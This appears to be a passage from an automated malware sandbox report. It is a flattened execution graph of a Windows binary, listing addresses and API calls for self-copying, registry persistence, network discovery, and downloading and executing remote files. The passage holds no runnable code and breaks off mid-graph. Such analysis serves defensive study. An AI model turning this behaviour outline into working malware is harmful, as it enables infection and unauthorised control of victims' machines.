                                                                                                                                                                                              execution_graph 4456 407940 Sleep CreateMutexA GetLastError 4457 407976 ExitProcess 4456->4457 4458 40797e 6 API calls 4456->4458 4459 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4458->4459 4460 407a23 4458->4460 4461 407dcb RegOpenKeyExW 4459->4461 4462 407d9f RegSetValueExW RegCloseKey 4459->4462 4535 40f1b0 GetLocaleInfoA strcmp 4460->4535 4464 407e24 RegOpenKeyExW 4461->4464 4465 407df8 RegSetValueExW RegCloseKey 4461->4465 4462->4461 4467 407e51 RegSetValueExW RegCloseKey 4464->4467 4468 407e7d RegOpenKeyExW 4464->4468 4465->4464 4467->4468 4473 407ed6 RegOpenKeyExW 4468->4473 4474 407eaa RegSetValueExW RegCloseKey 4468->4474 4469 407a30 ExitProcess 4470 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4471 407b36 Sleep wsprintfW CopyFileW 4470->4471 4472 407a8c SetFileAttributesW RegOpenKeyExW 4470->4472 4478 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4471->4478 4479 407b7e SetFileAttributesW RegOpenKeyExW 4471->4479 4472->4471 4477 407ac8 wcslen RegSetValueExW 4472->4477 4475 407f03 RegSetValueExW RegCloseKey 4473->4475 4476 407f2f RegOpenKeyExW 4473->4476 4474->4473 4475->4476 4481 407f88 RegOpenKeyExW 4476->4481 4482 407f5c RegSetValueExW RegCloseKey 4476->4482 4483 407b29 RegCloseKey 4477->4483 4484 407afd RegCloseKey 4477->4484 4478->4459 4480 407c87 SetFileAttributesW RegOpenKeyExW 4478->4480 4479->4478 4485 407bba wcslen RegSetValueExW 4479->4485 4480->4459 4486 407cc3 wcslen RegSetValueExW 4480->4486 4488 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4481->4488 4489 40801f RegOpenKeyExW 4481->4489 4482->4481 4483->4471 4537 40f400 memset memset CreateProcessW 4484->4537 4490 407c1b RegCloseKey 4485->4490 4491 407bef RegCloseKey 4485->4491 4492 407d24 RegCloseKey 4486->4492 4493 407cf8 RegCloseKey 4486->4493 4488->4489 4495 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4489->4495 4496 4080d9 RegOpenKeyExW 4489->4496 4490->4478 4497 40f400 6 API calls 4491->4497 4492->4459 4498 40f400 6 API calls 4493->4498 4495->4496 4500 4081f0 RegOpenKeyExW 4496->4500 4501 40810a 8 API calls 4496->4501 4502 407c08 4497->4502 4503 407d11 4498->4503 4499 407b21 ExitProcess 4504 408221 8 API calls 4500->4504 4505 408307 Sleep 4500->4505 4501->4500 4502->4490 4506 407c13 ExitProcess 4502->4506 4503->4492 4507 407d1c ExitProcess 4503->4507 4504->4505 4543 40d180 4505->4543 4510 408322 9 API calls 4546 405c00 InitializeCriticalSection CreateFileW 4510->4546 5361 4077f0 4510->5361 5368 4058c0 4510->5368 5377 406f70 Sleep GetModuleFileNameW 4510->5377 4513 40848e 4517 4083d7 CreateEventA 4576 40c8b0 4517->4576 4526 40dbe0 16 API calls 4527 408438 4526->4527 4528 40dbe0 16 API calls 4527->4528 4529 408453 4528->4529 4530 40dbe0 16 API calls 4529->4530 4531 40846f 4530->4531 4619 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4531->4619 4533 408480 4628 40de90 4533->4628 4536 407a28 4535->4536 4536->4469 4536->4470 4538 40f471 ShellExecuteW 4537->4538 4539 40f462 Sleep 4537->4539 4541 40f4a6 4538->4541 4542 40f497 Sleep 4538->4542 4540 407b16 4539->4540 4540->4483 4540->4499 4541->4540 4542->4540 4636 40d150 4543->4636 4547 405d11 4546->4547 4548 405c38 CreateFileMappingW 4546->4548 4558 40e0c0 CoInitializeEx 4547->4558 4548->4547 4549 405c59 MapViewOfFile 4548->4549 4549->4547 4550 405c78 GetFileSize 4549->4550 4554 405c8d 4550->4554 4551 405d07 UnmapViewOfFile 4551->4547 4552 405c9c 4552->4551 4554->4551 4554->4552 4555 405ccc 4554->4555 4765 40d1d0 4554->4765 4772 405d30 4554->4772 4557 40ab60 _invalid_parameter 3 API calls 4555->4557 4557->4552 5076 40e190 socket 4558->5076 4560 4083d2 4571 407390 CoInitializeEx SysAllocString 4560->4571 4561 40e168 5120 40ac80 4561->5120 4564 40e12a 5101 40b430 htons 4564->5101 4565 40e0e0 4565->4560 4565->4561 4565->4564 5086 40e400 4565->5086 4570 40eef0 24 API calls 4570->4561 4572 4073b2 4571->4572 4573 4073c8 CoUninitialize 4571->4573 5265 4073e0 4572->5265 4573->4517 5274 40c870 4576->5274 4579 40c870 3 API calls 4580 40c8ce 4579->4580 4581 40c870 3 API calls 4580->4581 4582 40c8de 4581->4582 4583 40c870 3 API calls 4582->4583 4584 4083ef 4583->4584 4585 40dbb0 4584->4585 4586 40a740 7 API calls 4585->4586 4587 40dbbb 4586->4587 4588 4083f9 4587->4588 4589 40dbc7 InitializeCriticalSection 4587->4589 4590 40bc70 InitializeCriticalSection 4588->4590 4589->4588 4597 40bc8a 4590->4597 4591 40bcb9 CreateFileW 4592 40bce0 CreateFileMappingW 4591->4592 4593 40bd8e 4591->4593 4592->4593 4595 40bd01 MapViewOfFile 4592->4595 5330 40b510 EnterCriticalSection 4593->5330 4595->4593 4598 40bd1c GetFileSize 4595->4598 4597->4591 5281 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4597->5281 5282 40b850 4597->5282 4605 40bd3b 4598->4605 4599 40bda7 4601 40dbe0 16 API calls 4599->4601 4602 408403 4601->4602 4607 40dbe0 4602->4607 4603 40bd84 UnmapViewOfFile 4603->4593 4605->4603 4606 40b850 31 API calls 4605->4606 5329 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4605->5329 4606->4605 4608 40dbf7 EnterCriticalSection 4607->4608 4609 40841c 4607->4609 5357 40dcd0 4608->5357 4609->4526 4612 40dcbb LeaveCriticalSection 4612->4609 4613 40a990 9 API calls 4614 40dc39 4613->4614 4614->4612 4615 40dc4b CreateThread 4614->4615 4615->4612 4616 40dc6e 4615->4616 4617 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle 4616->4617 4618 40dcb4 4616->4618 4617->4618 4618->4612 4620 40dd86 InterlockedExchangeAdd 4619->4620 4621 40de69 GetCurrentThread SetThreadPriority 4619->4621 4620->4621 4627 40dda0 4620->4627 4621->4533 4622 40ddb9 EnterCriticalSection 4622->4627 4623 40de27 LeaveCriticalSection 4625 40de3e 4623->4625 4623->4627 4624 40de03 WaitForSingleObject 4624->4627 4625->4621 4626 40de5c Sleep 4626->4627 4627->4621 4627->4622 4627->4623 4627->4624 4627->4625 4627->4626 4629 40df12 4628->4629 4630 40de9c EnterCriticalSection 4628->4630 4629->4513 4631 40deb8 LeaveCriticalSection DeleteCriticalSection 4630->4631 4633 40ab60 _invalid_parameter 3 API calls 4631->4633 4634 40df06 4633->4634 4635 40ab60 _invalid_parameter 3 API calls 4634->4635 4635->4629 4639 40cda0 4636->4639 4640 40cdd3 4639->4640 4641 40cdbe 4639->4641 4643 408317 4640->4643 4671 40cf80 4640->4671 4645 40ce00 4641->4645 4643->4510 4643->4513 4646 40ceb2 4645->4646 4647 40ce29 4645->4647 4650 40a740 7 API calls 4646->4650 4666 40ceaa 4646->4666 4647->4666 4705 40a740 4647->4705 4651 40ced8 4650->4651 4653 402420 7 API calls 4651->4653 4651->4666 4655 40cf05 4653->4655 4657 4024e0 10 API calls 4655->4657 4659 40cf1f 4657->4659 4658 40ce7f 4660 402420 7 API calls 4658->4660 4661 402420 7 API calls 4659->4661 4662 40ce90 4660->4662 4663 40cf30 4661->4663 4664 4024e0 10 API calls 4662->4664 4665 4024e0 10 API calls 4663->4665 4664->4666 4667 40cf4a 4665->4667 4666->4643 4668 402420 7 API calls 4667->4668 4669 40cf5b 4668->4669 4670 4024e0 10 API calls 4669->4670 4670->4666 4672 40cfa9 4671->4672 4673 40d05a 4671->4673 4674 40d052 4672->4674 4675 40a740 7 API calls 4672->4675 4673->4674 4677 40a740 7 API calls 4673->4677 4674->4643 4676 40cfbf 4675->4676 4676->4674 4679 402420 7 API calls 4676->4679 4678 40d07e 4677->4678 4678->4674 4681 402420 7 API calls 4678->4681 4680 40cfe3 4679->4680 4682 40a740 7 API calls 4680->4682 4683 40d0a2 4681->4683 4684 40cff2 4682->4684 4685 40a740 7 API calls 4683->4685 4687 4024e0 10 API calls 4684->4687 4686 40d0b1 4685->4686 4688 4024e0 10 API calls 4686->4688 4689 40d01b 4687->4689 4691 40d0da 4688->4691 4690 40ab60 _invalid_parameter 3 API calls 4689->4690 4692 40d027 4690->4692 4693 40ab60 _invalid_parameter 3 API calls 4691->4693 4694 402420 7 API calls 4692->4694 4695 40d0e6 4693->4695 4696 40d038 4694->4696 4697 402420 7 API calls 4695->4697 4698 4024e0 10 API calls 4696->4698 4699 40d0f7 4697->4699 4698->4674 4700 4024e0 10 API calls 4699->4700 4701 40d111 4700->4701 4702 402420 7 API calls 4701->4702 4703 40d122 4702->4703 4704 4024e0 10 API calls 4703->4704 4704->4674 4716 40a760 4705->4716 4708 402420 4737 40a950 4708->4737 4713 4024e0 4744 402540 4713->4744 4715 4024ff _invalid_parameter 4715->4658 4725 40a800 GetCurrentProcessId 4716->4725 4718 40a76b 4719 40a777 _invalid_parameter 4718->4719 4726 40a820 4718->4726 4721 40a74e 4719->4721 4722 40a792 HeapAlloc 4719->4722 4721->4666 4721->4708 4722->4721 4723 40a7b9 _invalid_parameter 4722->4723 4723->4721 4724 40a7d4 memset 4723->4724 4724->4721 4725->4718 4734 40a800 GetCurrentProcessId 4726->4734 4728 40a829 4729 40a846 HeapCreate 4728->4729 4735 40a890 GetProcessHeaps 4728->4735 4731 40a860 HeapSetInformation GetCurrentProcessId 4729->4731 4732 40a887 4729->4732 4731->4732 4732->4719 4734->4728 4736 40a83c 4735->4736 4736->4729 4736->4732 4738 40a760 _invalid_parameter 7 API calls 4737->4738 4739 40242b 4738->4739 4740 402820 4739->4740 4741 40282a 4740->4741 4742 40a950 _invalid_parameter 7 API calls 4741->4742 4743 402438 4742->4743 4743->4713 4745 40258e 4744->4745 4747 402551 4744->4747 4746 40a950 _invalid_parameter 7 API calls 4745->4746 4745->4747 4750 4025b2 _invalid_parameter 4746->4750 4747->4715 4748 4025e2 memcpy 4749 402606 _invalid_parameter 4748->4749 4751 40ab60 _invalid_parameter 3 API calls 4749->4751 4750->4748 4754 40ab60 4750->4754 4751->4747 4761 40a800 GetCurrentProcessId 4754->4761 4756 40ab6b 4757 4025df 4756->4757 4762 40aaa0 4756->4762 4757->4748 4760 40ab87 HeapFree 4760->4757 4761->4756 4763 40aad0 HeapValidate 4762->4763 4764 40aaf0 4762->4764 4763->4764 4764->4757 4764->4760 4782 40abd0 4765->4782 4767 40d211 4767->4554 4771 40ab60 _invalid_parameter 3 API calls 4771->4767 4995 40a990 4772->4995 4775 405d6a memcpy 4777 40abd0 8 API calls 4775->4777 4776 405e28 4776->4554 4778 405da1 4777->4778 5005 40cb40 4778->5005 4783 40abfd 4782->4783 4784 40a950 _invalid_parameter 7 API calls 4783->4784 4785 40ac12 4783->4785 4786 40ac14 memcpy 4783->4786 4784->4783 4785->4767 4787 40c6e0 4785->4787 4786->4783 4790 40c6ea 4787->4790 4791 40c721 memcmp 4790->4791 4792 40c748 4790->4792 4793 40ab60 _invalid_parameter 3 API calls 4790->4793 4795 40c709 4790->4795 4796 40cbd0 4790->4796 4810 4084a0 4790->4810 4791->4790 4794 40ab60 _invalid_parameter 3 API calls 4792->4794 4793->4790 4794->4795 4795->4767 4795->4771 4797 40cbdf _invalid_parameter 4796->4797 4798 40a950 _invalid_parameter 7 API calls 4797->4798 4809 40cbe9 4797->4809 4799 40cc78 4798->4799 4800 402420 7 API calls 4799->4800 4799->4809 4801 40cc8d 4800->4801 4802 402420 7 API calls 4801->4802 4803 40cc95 4802->4803 4805 40cced _invalid_parameter 4803->4805 4813 40cd40 4803->4813 4818 402470 4805->4818 4808 402470 3 API calls 4808->4809 4809->4790 4926 40a6c0 4810->4926 4814 4024e0 10 API calls 4813->4814 4815 40cd54 4814->4815 4824 4026f0 4815->4824 4817 40cd6c 4817->4803 4820 402484 _invalid_parameter 4818->4820 4821 4024ce 4818->4821 4819 40ab60 _invalid_parameter 3 API calls 4819->4821 4822 40ab60 _invalid_parameter 3 API calls 4820->4822 4823 4024ac 4820->4823 4821->4808 4822->4823 4823->4819 4827 402710 4824->4827 4826 40270a 4826->4817 4828 402724 4827->4828 4829 402540 __aligned_recalloc_base 10 API calls 4828->4829 4830 40276d 4829->4830 4831 402540 __aligned_recalloc_base 10 API calls 4830->4831 4832 40277d 4831->4832 4833 402540 __aligned_recalloc_base 10 API calls 4832->4833 4834 40278d 4833->4834 4835 402540 __aligned_recalloc_base 10 API calls 4834->4835 4836 40279d 4835->4836 4837 4027a6 4836->4837 4838 4027cf 4836->4838 4842 403e20 4837->4842 4859 403df0 4838->4859 4841 4027c7 _invalid_parameter 4841->4826 4843 402820 _invalid_parameter 7 API calls 4842->4843 4844 403e37 4843->4844 4845 402820 _invalid_parameter 7 API calls 4844->4845 4846 403e46 4845->4846 4847 402820 _invalid_parameter 7 API calls 4846->4847 4848 403e55 4847->4848 4849 402820 _invalid_parameter 7 API calls 4848->4849 4850 403e64 _invalid_parameter 4849->4850 4853 40400f _invalid_parameter 4850->4853 4862 402850 4850->4862 4852 402850 _invalid_parameter 3 API calls 4852->4853 4853->4852 4854 404035 _invalid_parameter 4853->4854 4855 402850 _invalid_parameter 3 API calls 4854->4855 4856 40405b _invalid_parameter 4854->4856 4855->4854 4857 402850 _invalid_parameter 3 API calls 4856->4857 4858 404081 4856->4858 4857->4856 4858->4841 4866 404090 4859->4866 4861 403e0c 4861->4841 4863 402866 4862->4863 4864 40285b 4862->4864 4863->4850 4865 40ab60 _invalid_parameter 3 API calls 4864->4865 4865->4863 4867 4040a6 _invalid_parameter 4866->4867 4868 4040dd 4867->4868 4870 4040b8 _invalid_parameter 4867->4870 4871 404103 4867->4871 4896 403ca0 4868->4896 4870->4861 4872 40413d 4871->4872 4873 40415e 4871->4873 4906 404680 4872->4906 4874 402820 _invalid_parameter 7 API calls 4873->4874 4876 40416f 4874->4876 4877 402820 _invalid_parameter 7 API calls 4876->4877 4878 40417e 4877->4878 4879 402820 _invalid_parameter 7 API calls 4878->4879 4880 40418d 4879->4880 4881 402820 _invalid_parameter 7 API calls 4880->4881 4882 40419c 4881->4882 4919 403d70 4882->4919 4884 402820 _invalid_parameter 7 API calls 4885 4041ca _invalid_parameter 4884->4885 4885->4884 4888 404284 _invalid_parameter 4885->4888 4886 402850 _invalid_parameter 3 API calls 4886->4888 4887 4045a3 _invalid_parameter 4889 402850 _invalid_parameter 3 API calls 4887->4889 4890 4045c9 _invalid_parameter 4887->4890 4888->4886 4888->4887 4889->4887 4891 402850 _invalid_parameter 3 API calls 4890->4891 4892 4045ef _invalid_parameter 4890->4892 4891->4890 4893 402850 _invalid_parameter 3 API calls 4892->4893 4894 404615 _invalid_parameter 4892->4894 4893->4892 4894->4870 4895 402850 _invalid_parameter 3 API calls 4894->4895 4895->4894 4897 403cae 4896->4897 4898 402820 _invalid_parameter 7 API calls 4897->4898 4899 403ccb 4898->4899 4900 402820 _invalid_parameter 7 API calls 4899->4900 4901 403cda _invalid_parameter 4900->4901 4902 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4901->4902 4903 403d3a _invalid_parameter 4901->4903 4902->4901 4904 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4903->4904 4905 403d60 4903->4905 4904->4903 4905->4870 4907 402820 _invalid_parameter 7 API calls 4906->4907 4908 404697 4907->4908 4909 402820 _invalid_parameter 7 API calls 4908->4909 4910 4046a6 4909->4910 4911 402820 _invalid_parameter 7 API calls 4910->4911 4918 4046b5 _invalid_parameter 4911->4918 4912 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4912->4918 4913 404841 _invalid_parameter 4914 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4913->4914 4915 404867 _invalid_parameter 4913->4915 4914->4913 4916 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4915->4916 4917 40488d 4915->4917 4916->4915 4917->4870 4918->4912 4918->4913 4920 402820 _invalid_parameter 7 API calls 4919->4920 4921 403d7f _invalid_parameter 4920->4921 4922 403ca0 _invalid_parameter 9 API calls 4921->4922 4923 403db8 _invalid_parameter 4922->4923 4924 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4923->4924 4925 403de3 4923->4925 4924->4923 4925->4885 4927 40a6d2 4926->4927 4930 40a620 4927->4930 4931 40a950 _invalid_parameter 7 API calls 4930->4931 4938 40a630 4931->4938 4934 40ab60 _invalid_parameter 3 API calls 4935 4084bf 4934->4935 4935->4790 4936 40a66c 4936->4934 4938->4935 4938->4936 4939 409b50 4938->4939 4946 40a140 4938->4946 4951 40a510 4938->4951 4940 409b63 4939->4940 4945 409b59 4939->4945 4941 409ba6 memset 4940->4941 4940->4945 4942 409bc7 4941->4942 4941->4945 4943 409bcd memcpy 4942->4943 4942->4945 4959 409920 4943->4959 4945->4938 4947 40a14d 4946->4947 4948 40a157 4946->4948 4947->4938 4948->4947 4949 40a24f memcpy 4948->4949 4964 409e70 4948->4964 4949->4948 4952 40a51c 4951->4952 4954 40a526 4951->4954 4952->4938 4953 409e70 64 API calls 4955 40a5a7 4953->4955 4954->4952 4954->4953 4955->4952 4956 409920 6 API calls 4955->4956 4957 40a5c6 4956->4957 4957->4952 4958 40a5db memcpy 4957->4958 4958->4952 4960 40996e 4959->4960 4962 40992e 4959->4962 4960->4945 4962->4960 4963 409860 6 API calls 4962->4963 4963->4962 4965 409e8a 4964->4965 4967 409e80 4964->4967 4965->4967 4974 409cb0 4965->4974 4967->4948 4969 409fc8 memcpy 4969->4967 4971 409fe7 memcpy 4972 40a111 4971->4972 4973 409e70 62 API calls 4972->4973 4973->4967 4975 409cbd 4974->4975 4976 409cc7 4974->4976 4975->4967 4975->4969 4975->4971 4976->4975 4977 409d50 4976->4977 4979 409d55 4976->4979 4980 409d38 4976->4980 4985 409610 4977->4985 4981 409920 6 API calls 4979->4981 4983 409920 6 API calls 4980->4983 4981->4977 4983->4977 4984 409dfc memset 4984->4975 4986 40961f 4985->4986 4987 409629 4985->4987 4986->4975 4986->4984 4987->4986 4988 4094e0 9 API calls 4987->4988 4989 409722 4988->4989 4990 40a950 _invalid_parameter 7 API calls 4989->4990 4991 409771 4990->4991 4991->4986 4992 409350 46 API calls 4991->4992 4993 40979e 4992->4993 4994 40ab60 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4993->4994 4994->4986 5014 40a800 GetCurrentProcessId 4995->5014 4997 40a99b 4998 40a820 _invalid_parameter 5 API calls 4997->4998 5003 40a9a7 _invalid_parameter 4997->5003 4998->5003 4999 40aaa0 _invalid_parameter HeapValidate 4999->5003 5000 40aa50 HeapAlloc 5000->5003 5001 40aa1a HeapReAlloc 5001->5003 5002 40ab60 _invalid_parameter 3 API calls 5002->5003 5003->4999 5003->5000 5003->5001 5003->5002 5004 405d55 5003->5004 5004->4775 5004->4776 5006 40cb4b 5005->5006 5007 40a950 _invalid_parameter 7 API calls 5006->5007 5008 405ded 5006->5008 5007->5006 5008->4776 5009 4076c0 5008->5009 5010 40a950 _invalid_parameter 7 API calls 5009->5010 5011 4076d0 5010->5011 5012 407717 5011->5012 5013 4076dc memcpy CreateThread 5011->5013 5012->4776 5013->5012 5015 407720 GetTickCount srand rand Sleep 5013->5015 5014->4997 5016 4077ad 5015->5016 5022 407757 5015->5022 5017 4077ab 5016->5017 5018 40f560 58 API calls 5016->5018 5019 40ab60 _invalid_parameter 3 API calls 5017->5019 5018->5017 5021 4077d8 5019->5021 5020 407766 StrChrA 5020->5022 5022->5017 5022->5020 5025 40f560 9 API calls 5022->5025 5026 40f623 InternetOpenUrlW 5025->5026 5027 40f78e InternetCloseHandle Sleep 5025->5027 5028 40f781 InternetCloseHandle 5026->5028 5029 40f652 CreateFileW 5026->5029 5030 40f7b5 6 API calls 5027->5030 5047 407795 Sleep 5027->5047 5028->5027 5031 40f681 InternetReadFile 5029->5031 5051 40f75e 5029->5051 5032 40f831 wsprintfW DeleteFileW Sleep 5030->5032 5030->5047 5033 40f6d4 wsprintfW DeleteFileW Sleep 5031->5033 5034 40f6a5 5031->5034 5035 40f240 18 API calls 5032->5035 5053 40f240 CreateFileW 5033->5053 5034->5033 5036 40f6ae WriteFile 5034->5036 5037 40f871 5035->5037 5036->5031 5039 40f87b Sleep 5037->5039 5040 40f8af DeleteFileW 5037->5040 5042 40f400 6 API calls 5039->5042 5040->5047 5044 40f892 5042->5044 5044->5047 5048 40f8a5 ExitProcess 5044->5048 5045 40f767 DeleteFileW 5045->5051 5046 40f72b Sleep 5049 40f400 6 API calls 5046->5049 5047->5022 5050 40f742 5049->5050 5050->5051 5052 40f756 ExitProcess 5050->5052 5051->5028 5054 40f285 CreateFileMappingW 5053->5054 5055 40f386 5053->5055 5054->5055 5056 40f2a6 MapViewOfFile 5054->5056 5057 40f3a0 CreateFileW 5055->5057 5058 40f3f1 5055->5058 5056->5055 5061 40f2c5 GetFileSize 5056->5061 5059 40f3c2 WriteFile 5057->5059 5060 40f3e8 5057->5060 5058->5045 5058->5046 5059->5060 5062 40ab60 _invalid_parameter 3 API calls 5060->5062 5063 40f2e1 5061->5063 5064 40f37c UnmapViewOfFile 5061->5064 5062->5058 5073 40d1a0 5063->5073 5064->5055 5067 40cb40 7 API calls 5068 40f330 5067->5068 5068->5064 5069 40f34d memcmp 5068->5069 5069->5064 5070 40f369 5069->5070 5071 40ab60 _invalid_parameter 3 API calls 5070->5071 5072 40f372 5071->5072 5072->5064 5074 40cbd0 10 API calls 5073->5074 5075 40d1c4 5074->5075 5075->5064 5075->5067 5077 40e1bd htons inet_addr setsockopt 5076->5077 5082 40e2ee 5076->5082 5078 40b430 8 API calls 5077->5078 5079 40e236 bind lstrlenA sendto ioctlsocket 5078->5079 5085 40e28b 5079->5085 5082->4565 5083 40e2b2 5133 40b4f0 shutdown closesocket 5083->5133 5084 40a990 9 API calls 5084->5085 5085->5083 5085->5084 5124 40e310 5085->5124 5140 40e640 memset InternetCrackUrlA InternetOpenA 5086->5140 5089 40e51e 5089->4565 5091 40ab60 _invalid_parameter 3 API calls 5091->5089 5095 40e4eb 5095->5091 5098 40e4e1 SysFreeString 5098->5095 5247 40b3f0 inet_addr 5101->5247 5104 40b48c connect 5105 40b4a0 getsockname 5104->5105 5106 40b4d4 5104->5106 5105->5106 5250 40b4f0 shutdown closesocket 5106->5250 5108 40b4dd 5109 40eef0 5108->5109 5251 40b3d0 inet_ntoa 5109->5251 5111 40ef06 5112 40d470 11 API calls 5111->5112 5113 40ef25 5112->5113 5118 40e14c 5113->5118 5252 40ef70 memset InternetCrackUrlA InternetOpenA 5113->5252 5116 40ab60 _invalid_parameter 3 API calls 5119 40ef5c 5116->5119 5117 40ab60 _invalid_parameter 3 API calls 5117->5118 5118->4570 5119->5117 5123 40ac84 5120->5123 5121 40ac8a 5121->4560 5122 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5122->5123 5123->5121 5123->5122 5129 40e32c 5124->5129 5125 40e3f4 5125->5085 5126 40e348 recvfrom 5127 40e376 StrCmpNIA 5126->5127 5128 40e369 Sleep 5126->5128 5127->5129 5130 40e395 StrStrIA 5127->5130 5128->5129 5129->5125 5129->5126 5130->5129 5131 40e3b6 StrChrA 5130->5131 5134 40d320 5131->5134 5133->5082 5135 40d32b 5134->5135 5136 40d331 lstrlenA 5135->5136 5137 40a950 _invalid_parameter 7 API calls 5135->5137 5138 40d344 5135->5138 5139 40d360 memcpy 5135->5139 5136->5135 5136->5138 5137->5135 5138->5129 5139->5135 5139->5138 5141 40e6e1 InternetConnectA 5140->5141 5142 40e41a 5140->5142 5143 40e84a InternetCloseHandle 5141->5143 5144 40e71a HttpOpenRequestA 5141->5144 5142->5089 5153 40e530 5142->5153 5143->5142 5145 40e750 HttpSendRequestA 5144->5145 5146 40e83d InternetCloseHandle 5144->5146 5147 40e830 InternetCloseHandle 5145->5147 5149 40e76d 5145->5149 5146->5143 5147->5146 5148 40e78e InternetReadFile 5148->5149 5150 40e7bb 5148->5150 5149->5148 5149->5150 5151 40a990 9 API calls 5149->5151 5150->5147 5152 40e7d6 memcpy 5151->5152 5152->5149 5182 40d250 5153->5182 5156 40e433 5156->5095 5163 40eea0 5156->5163 5157 40e55a SysAllocString 5158 40e571 CoCreateInstance 5157->5158 5159 40e627 5157->5159 5160 40e61d SysFreeString 5158->5160 5162 40e596 5158->5162 5161 40ab60 _invalid_parameter 3 API calls 5159->5161 5160->5159 5161->5156 5162->5160 5199 40e9f0 5163->5199 5166 40e870 5204 40ecc0 5166->5204 5171 40ee20 6 API calls 5172 40e8c7 5171->5172 5178 40e4b2 5172->5178 5221 40eae0 5172->5221 5175 40e8ff 5175->5178 5226 40e990 5175->5226 5176 40eae0 6 API calls 5176->5175 5178->5098 5179 40d470 5178->5179 5242 40d3e0 5179->5242 5186 40d25d 5182->5186 5183 40d263 lstrlenA 5183->5186 5188 40d276 5183->5188 5185 40a950 _invalid_parameter 7 API calls 5185->5186 5186->5183 5186->5185 5186->5188 5189 40ab60 _invalid_parameter 3 API calls 5186->5189 5190 405740 5186->5190 5194 4056f0 5186->5194 5188->5156 5188->5157 5189->5186 5191 405757 MultiByteToWideChar 5190->5191 5192 40574a lstrlenA 5190->5192 5193 40577c 5191->5193 5192->5191 5193->5186 5195 4056fb 5194->5195 5196 405701 lstrlenA 5195->5196 5197 405740 2 API calls 5195->5197 5198 405737 5195->5198 5196->5195 5197->5195 5198->5186 5202 40ea16 5199->5202 5200 40e49d 5200->5095 5200->5166 5201 40ea93 lstrcmpiW 5201->5202 5203 40eaab SysFreeString 5201->5203 5202->5200 5202->5201 5202->5203 5203->5202 5206 40ece6 5204->5206 5205 40e88b 5205->5178 5216 40ee20 5205->5216 5206->5205 5207 40ed73 lstrcmpiW 5206->5207 5208 40edf3 SysFreeString 5207->5208 5209 40ed86 5207->5209 5208->5205 5210 40e990 2 API calls 5209->5210 5212 40ed94 5210->5212 5211 40ede5 5211->5208 5212->5208 5212->5211 5213 40edc3 lstrcmpiW 5212->5213 5214 40edd5 5213->5214 5215 40eddb SysFreeString 5213->5215 5214->5215 5215->5211 5217 40e990 2 API calls 5216->5217 5218 40ee3b 5217->5218 5219 40ecc0 6 API calls 5218->5219 5220 40e8a9 5218->5220 5219->5220 5220->5171 5220->5178 5222 40e990 2 API calls 5221->5222 5223 40eafb 5222->5223 5225 40e8e5 5223->5225 5230 40eb60 5223->5230 5225->5175 5225->5176 5227 40e9b6 5226->5227 5228 40e9cd 5227->5228 5229 40e9f0 2 API calls 5227->5229 5228->5178 5229->5228 5231 40eb86 5230->5231 5232 40ec9d 5231->5232 5233 40ec13 lstrcmpiW 5231->5233 5232->5225 5234 40ec93 SysFreeString 5233->5234 5235 40ec26 5233->5235 5234->5232 5236 40e990 2 API calls 5235->5236 5238 40ec34 5236->5238 5237 40ec85 5237->5234 5238->5234 5238->5237 5239 40ec63 lstrcmpiW 5238->5239 5240 40ec75 5239->5240 5241 40ec7b SysFreeString 5239->5241 5240->5241 5241->5237 5246 40d3ed 5242->5246 5243 40d390 _vscprintf wvsprintfA 5243->5246 5244 40d408 SysFreeString 5244->5098 5245 40a990 9 API calls 5245->5246 5246->5243 5246->5244 5246->5245 5248 40b409 gethostbyname 5247->5248 5249 40b41c socket 5247->5249 5248->5249 5249->5104 5249->5108 5250->5108 5251->5111 5253 40ef47 5252->5253 5254 40f014 InternetConnectA 5252->5254 5253->5116 5253->5119 5255 40f194 InternetCloseHandle 5254->5255 5256 40f04d HttpOpenRequestA 5254->5256 5255->5253 5257 40f083 HttpAddRequestHeadersA HttpSendRequestA 5256->5257 5258 40f187 InternetCloseHandle 5256->5258 5259 40f17a InternetCloseHandle 5257->5259 5262 40f0cd 5257->5262 5258->5255 5259->5258 5260 40f0e4 InternetReadFile 5261 40f111 5260->5261 5260->5262 5261->5259 5262->5260 5262->5261 5263 40a990 9 API calls 5262->5263 5264 40f12c memcpy 5263->5264 5264->5262 5271 407417 5265->5271 5266 407670 CoCreateInstance 5266->5271 5267 4075eb 5269 4075f4 SysFreeString 5267->5269 5270 4073bb SysFreeString 5267->5270 5268 40ab60 _invalid_parameter 3 API calls 5268->5267 5269->5270 5270->4573 5271->5266 5272 407566 SysAllocString 5271->5272 5273 407432 5271->5273 5272->5271 5272->5273 5273->5267 5273->5268 5275 40c87a 5274->5275 5276 40c87e 5274->5276 5275->4579 5278 40c830 CryptAcquireContextW 5276->5278 5279 40c86b 5278->5279 5280 40c84d CryptGenRandom CryptReleaseContext 5278->5280 5279->5275 5280->5279 5281->4597 5333 40b780 gethostname 5282->5333 5285 40b869 5285->4597 5287 40b87c strcmp 5287->5285 5288 40b891 5287->5288 5337 40b3d0 inet_ntoa 5288->5337 5290 40b89f strstr 5291 40b8f0 5290->5291 5292 40b8af 5290->5292 5340 40b3d0 inet_ntoa 5291->5340 5338 40b3d0 inet_ntoa 5292->5338 5295 40b8bd strstr 5295->5285 5297 40b8cd 5295->5297 5296 40b8fe strstr 5298 40b90e 5296->5298 5299 40b94f 5296->5299 5339 40b3d0 inet_ntoa 5297->5339 5341 40b3d0 inet_ntoa 5298->5341 5343 40b3d0 inet_ntoa 5299->5343 5303 40b95d strstr 5306 40b96d 5303->5306 5307 40b9ae EnterCriticalSection 5303->5307 5304 40b8db strstr 5304->5285 5304->5291 5305 40b91c strstr 5305->5285 